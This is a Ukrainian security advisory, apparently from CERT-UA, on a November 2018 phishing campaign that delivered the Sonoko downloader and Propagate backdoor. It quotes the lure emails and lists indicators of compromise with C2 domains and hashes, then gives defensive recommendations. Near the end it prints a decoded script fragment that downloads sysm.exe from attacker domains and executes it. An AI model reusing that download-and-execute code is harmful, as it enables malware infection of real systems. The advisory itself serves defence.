Наші новини


Дізнайтеся першими про результати нашої роботи та останні новини
в сфері інформаційної безпеки

vhed0tkX2O71PXSUYz4k2Xc4zPBRhL25rm4aOz9a.jpeg

З 8.11.2018 по 13.11.2018 виявлено масову розсилку вірусу Sonoko за допомогою електронної пошти з подібними за змістом листами:

Добрий день. Прошу прислать мне акт сверки за прошлую неделю.
Счета и выписку прилагаю.

С уважением
Бородавко Александр Владимирович

ТОВ Технік

(044) 312-8544”

з прикріпленим файлом “рахунки компания технік.zip”

або

“Приветствую.

Счета за ноябрь, просьба оплатить до конца недели.

С уважением Филипова Алла
Компания "Спец Строй Монтаж"
т. 0665718812”

з  прикріпленим файлом “За текущий месяц рах.ф. Спецбуд.lzh”

         Прикріплений архівний файл “рахунки компания технік.zip” містить файл “Компания.png” та архівний файл  “рахунки компания технік.lzh”, який при активуванні запускає javascript “зг. дог рах. фак 708.js”, а для прикриття відкриває Word документ “07.11.18р список.docx”.

         В результі виконання javascript “зг. дог рах. фак 708.js” завантажується виконувана програма sysm.exe, яка непомітна в системі, оскільки  може не проявляти активність у випадку відсутності зв'язку з інтернетом. Основна діяльність  sysm.exe, полягає в очікуванні команд з адрес, закодованих у коді  в 16-річному форматі. Очікування команд реалізовано як сокет-сервер.

         Скрипт  “зг. дог рах. фак 708.js”, ідентифікований як Sonoko, та виконувана програма sysm.exe, ідентифікована як Propagate, небезпечні тим, що надають зловмисникам віддалений доступ до ураженого комп'ютера, змінюють мережеві налаштування, збирають історію браузера, можуть завантажувати інші шкідливі програми та змінювати значення реєстру.

         Закодовані адреси є дещо цікавими, оскільки з адреси 5.8.0.2 забезпечується Freevpn service на nx0.ru, а  15.3.0.10  відноситься до HP-INTERNET мережі.

 

Індикатори компрометації (IOC):

Файлова система:
%AppData%\Microsoft\Windows\Recent\ºзг. дог рах. фак 708 .js.lnk
%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8NYNNL1S\sysm[1].exe
\Microsoft\Windows\Templates\966449.exe
або
%AppData%\Microsoft\Windows\Templates\223329.exe
%USERNAME%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018082720180828\index.dat
Реєстр:
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect"
Електронна пошта та адреса, з яких проводилась розсилка можуть мати назву:
fortshritt@zp.ukrtel.net
a-prom@sm.ukrtel.net
Процеси:
966449.exe
223329.exe
Контрольні сервера та домени (С2):
districoperav.icu (188.225.10.43 (RU))
varanasiclick.ru (185.224.249.70 (RU))
Шкідливі файли:
Компания.png
md5 13841d586c5a5b1028bd93fb1bbdd8d1
рахунки компания технік.zip
md5 15afe96d35c44d0b4f662a79a81f6fec
рахунки компания технік.lzh
md5 bc290efdca6eeccd3a058b5ffb27af8f 
https://www.virustotal.com/#/file/f217caf6ede8a63cdc9b6bcc9e754411da8f943885a9083904f2e4edf2ae4d32/detection
Trojan:Win32/Sonoko.A!ms
07.11.18р список.docx
md5 9283c127bfe493e8d943073032bc052b

зг. дог рах. фак 708.js
md5 7d63d6915374a527a01f3defae2e7f12 
https://www.virustotal.com/#/file/fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10/detection
Trojan:Win32/Sonoko.A!ms


./За текущий месяц рах.ф. Спецбуд.lzh

md5 df13205a3ff70c8eddbe4ccdaac03a4a


./рахунки ООО Спецстрой.xls.js

md5 f3591d95a5c9fe87bf7082a3053470e3 

https://www.virustotal.com/#/file/37b95bd4a7ef209c8e80348921e024c48308243ec3889b0a6d892260a132e3e1/detection


sysm.exe

e96c12188fca0652c36d4d0acc5a72f5 

https://www.virustotal.com/#/file/0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21/behavior

Propagate/Unwaders


Адресса отгрузки.xlsx

md5 858f6f7a781c47c925c0a5a87c3c4ad1 

Частина розшифрованого змісту сткрипта:

“var Stream = new ActiveXObject("ADODB.Stream");

HTTP.Open("GET", "http://districoperav.icu/neifo/sysm.exe", false); HTTP.Send(); if (HTTP.Status == 200) {

Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody);

Stream.Position = 0; Stream.SaveToFile(path, 2);

Stream.Close(); sh.ShellExecute(path, "", "", "open", 1); } else {

HTTP.Open("GET", "http://varanasiclick.ru/neifo/sysm.exe", false); HTTP.Send(); if (HTTP.Status == 200) {

Рекомендації CERT-UA:

- уникайте повідомлень вказаного та схожого змісту та застережіть персонал від запуску вкладень у підозрілих повідомленнях та файлів з виконуваними форматами ;

- зверніть увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштового веб-трафіку, налаштуйте захист від спаму та підробки адреси відправника за допомогою технологій DKIM, SPF, DMARC;

- не завантажуйте з невідомих джерел файли і не активуйте підозрілі виконувані файли;

 - заблокуйте виконання файлів *.exe, *.jar, та  *.js з директорій %TEMP%, %APPDATA%

- регулярно робіть резервні копії важливого програмного забезпечення та данних;

- оновити антивірусну базу та просканувати потенційно заражені системи;

- регулярно оновлюйте операційну систему та програмне забезпечення;

- перевірте журнальні файли на предмет наявності записів з зазначеними вище індикаторами;

- користуйтеся ліцензійним ПЗ, адже безкоштовні активатори та генератори ключів майже завжди містять в собі шкідливе ПЗ.

 

 

Повідомити про інцидент